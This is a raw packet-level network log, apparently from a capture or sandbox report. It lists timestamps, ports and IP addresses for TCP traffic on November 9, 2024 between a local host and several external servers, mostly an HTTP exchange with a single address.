Nov 9, 2024 02:47:36.111686945 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.111721992 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.111740112 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.113118887 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.113140106 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.113176107 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.113183975 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.113208055 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.114938974 CET	443	53063	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.116076946 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.116312027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.137691975 CET	53061	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:36.137700081 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:36.138207912 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:36.138797045 CET	53063	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.138809919 CET	443	53063	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.139439106 CET	53061	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:36.139518023 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:36.139875889 CET	53061	443	192.168.2.7	20.125.209.212
Nov 9, 2024 02:47:36.140006065 CET	443	53063	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.140077114 CET	53063	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.141094923 CET	53063	443	192.168.2.7	204.79.197.219
Nov 9, 2024 02:47:36.141179085 CET	443	53063	204.79.197.219	192.168.2.7
Nov 9, 2024 02:47:36.150418997 CET	53062	443	192.168.2.7	23.198.7.184
Nov 9, 2024 02:47:36.182430983 CET	53057	443	192.168.2.7	13.91.96.185
Nov 9, 2024 02:47:36.183332920 CET	443	53061	20.125.209.212	192.168.2.7
Nov 9, 2024 02:47:36.191006899 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.191019058 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.191030979 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.191145897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.191145897 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.206079006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.206152916 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.206166983 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.206211090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.206211090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.206234932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.211091995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211105108 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211116076 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211186886 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.211226940 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.211457968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211469889 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211482048 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211493015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211509943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211519003 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.211565018 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.211846113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.211934090 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212003946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212014914 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212027073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212037086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212048054 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212055922 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212081909 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212105036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212146997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212157965 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212169886 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212184906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212187052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212198973 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212201118 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212213039 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212217093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212224960 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212235928 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212236881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.212268114 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.212285995 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.213864088 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.213874102 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.213884115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.213896990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.213908911 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.213912010 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.213921070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.213933945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.213968039 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.213984013 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.213999033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214009047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214087963 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214188099 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214200020 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214215040 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214241982 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214267015 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214267015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214281082 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214294910 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214304924 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214308023 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214325905 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214349985 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214385033 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214560986 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214571953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214587927 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214597940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214608908 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214620113 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214629889 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214631081 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214643002 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214657068 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214669943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214669943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214689016 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214705944 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214718103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214729071 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214739084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214751005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214761972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214767933 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214768887 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214782953 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214782953 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214814901 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214889050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214905977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214916945 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214926958 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214939117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214948893 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.214961052 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.214977980 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215028048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215059996 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215075970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215085030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215095997 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215106964 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215106964 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215121031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215131998 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215135098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215162039 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215179920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215197086 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215209961 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215220928 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215254068 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215265036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215379953 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215390921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215401888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215413094 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215425968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215430021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215436935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215449095 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215460062 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215465069 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215477943 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215483904 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215490103 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215501070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215504885 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215526104 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215533972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215547085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215555906 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215555906 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215573072 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215583086 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215585947 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215600014 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215610027 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215611935 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215626001 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215648890 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215652943 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215689898 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215871096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215886116 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215898037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215909004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215917110 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215922117 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215928078 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215935946 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.215954065 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.215986967 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216017962 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216029882 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216042995 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216053009 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216063976 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216073990 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216082096 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216084957 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216104031 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216125965 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216155052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216169119 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216178894 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216190100 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216201067 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216228962 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216264009 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216301918 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216316938 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216329098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216341972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216355085 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216356039 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216372013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216373920 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216397047 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216433048 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216595888 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216608047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216618061 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216629982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216644049 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216645956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216655970 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216666937 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216675043 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216680050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216691017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216733932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216733932 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216744900 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216758013 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216770887 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216783047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216799021 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216814995 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216829062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.216927052 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216938972 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216949940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216964006 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216976881 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.216979980 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217031956 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217065096 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217065096 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217081070 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217092037 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217103004 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217139006 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217143059 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217156887 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217168093 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217175007 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217185974 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217196941 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217197895 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217221022 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217256069 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217264891 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217277050 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217288017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217298031 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217309952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217320919 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217322111 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217344046 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217355967 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217401028 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217417955 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217430115 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217442036 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217448950 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217458963 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217462063 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217473030 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217477083 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217487097 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217493057 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217499971 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217513084 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217519999 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217523098 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217534065 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217546940 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217550993 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217575073 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217578888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217588902 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217597961 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217622042 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217637062 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217739105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217751026 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217761993 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217787981 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217809916 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217885017 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217900038 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217911005 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.217940092 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.217964888 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.218041897 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218054056 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218065977 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218105078 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.218116045 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.218188047 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218199968 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218209982 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218221903 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218233109 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.218290091 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.218336105 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218353987 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218364000 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218375921 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218410015 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.218427896 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.218503952 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218513966 CET	80	52982	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:36.218553066 CET	52982	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:36.218811035 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.218836069 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.218982935 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.220592976 CET	53070	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.220611095 CET	443	53070	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.221654892 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.221709013 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.221774101 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.222110987 CET	53071	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.222126961 CET	443	53071	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.223016024 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.223037004 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.223210096 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.223392963 CET	53072	443	192.168.2.7	23.38.189.81
Nov 9, 2024 02:47:36.223407030 CET	443	53072	23.38.189.81	192.168.2.7
Nov 9, 2024 02:47:36.232184887 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.232198000 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.232235909 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.232250929 CET	443	53057	13.91.96.185	192.168.2.7
Nov 9, 2024 02:47:36.232285023 CET	53057	443	192.168.2.7	13.91.96.185
